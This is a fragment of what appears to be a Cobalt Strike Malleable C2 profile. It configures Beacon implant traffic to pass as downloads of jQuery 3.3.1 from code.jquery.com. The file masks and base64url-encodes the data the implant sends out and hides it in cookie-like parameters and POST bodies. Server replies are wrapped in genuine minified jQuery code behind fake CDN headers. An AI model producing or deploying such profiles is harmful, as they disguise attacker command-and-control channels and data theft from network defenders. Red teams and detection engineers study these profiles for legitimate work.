490 | ##    Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel.
491 | ## Defaults:
492 | ##    uri "/activity"
493 | ##    Headers (Sample)
494 | ##      Accept: */*
495 | ##      Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
496 | ##      User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
497 | ## Guidelines:
498 | ##    - Decide if you want to use HTTP GET or HTTP POST requests for this section
499 | ##    - Add customize HTTP headers to the HTTP traffic of your campaign
500 | ##    - Analyze sample HTTP traffic to use as a reference
501 | ## Use HTTP POST for http-post section
502 | ## Uncomment this Section to activate
503 | http-post {
504 | 
505 |     set uri "/jquery-3.3.2.min.js";
506 |     set verb "POST";
507 | 
508 |     client {
509 | 
510 |         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
511 |         #header "Host" "code.jquery.com";
512 |         header "Referer" "http://code.jquery.com/";
513 |         header "Accept-Encoding" "gzip, deflate";
514 |        
515 |         id {
516 |             #mask;       
517 |             #base64url;
518 |             parameter "__cfduid";            
519 |         }
520 |               
521 |         output {
522 |             mask;
523 |             base64url;
524 | 	    prepend "data=";
525 |             print;
526 |         }
527 |     }
528 | 
529 |     server {
530 | 
531 |         header "Server" "NetDNA-cache/2.2";
532 |         header "Cache-Control" "max-age=0, no-cache";
533 |         header "Pragma" "no-cache";
534 |         header "Connection" "keep-alive";
535 |         header "Content-Type" "application/javascript; charset=utf-8";
536 | 
537 |         output {
538 |             mask;
539 |             base64url;
540 |             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
541 |             # 2nd Line            
542 |             prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
543 |             # 1st Line
544 |             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
545 |             append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
546 |             print;
547 |         }
548 |     }
549 | }
550 | 
551 | ## Use HTTP GET for http-post section
552 | ## Uncomment this Section to activate
553 | # http-post {
554 | 
555 | #     set uri "/jquery-3.3.2.min.js";
556 | #     set verb "GET";
557 | 
558 | #     client {
559 | 
560 | #         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
561 | #         #header "Host" "code.jquery.com";
562 | #         header "Referer" "http://code.jquery.com/";
563 | #         header "Accept-Encoding" "gzip, deflate";
564 |        
565 | #         id {
566 | #             mask;       
567 | #             base64url;
568 | #             parameter "__cfduid";            
569 | #         }
570 |               
571 | #         output {
572 | #             mask;
573 | #             base64url;
574 | # 			  parameter "__tg";
575 | #         }
576 | #     }
577 | 
578 | #     server {
579 | 
580 | #         header "Server" "NetDNA-cache/2.2";
581 | #         header "Cache-Control" "max-age=0, no-cache";
582 | #         header "Pragma" "no-cache";
583 | #         header "Connection" "keep-alive";
584 | #         header "Content-Type" "application/javascript; charset=utf-8";
585 | 
586 | #         output {
587 | #             mask;
588 | #             base64url;
589 | #             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
590 | #             # 2nd Line            
591 | #             prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
592 | #             # 1st Line
593 | #             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
594 | #             append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
595 | #             print;
596 | #         }
597 | #     }
598 | # }
599 | 
600 | ## CS 4.0 Profile Variants
601 | ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other.
602 | ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax:
603 | ## [block name] "variant name" { ... }. Here's a variant http-get block named "My Variant":
604 | ## http-get "My Variant" {
605 | ##	client {
606 | ##		parameter "bar" "blah";
607 | 


--------------------------------------------------------------------------------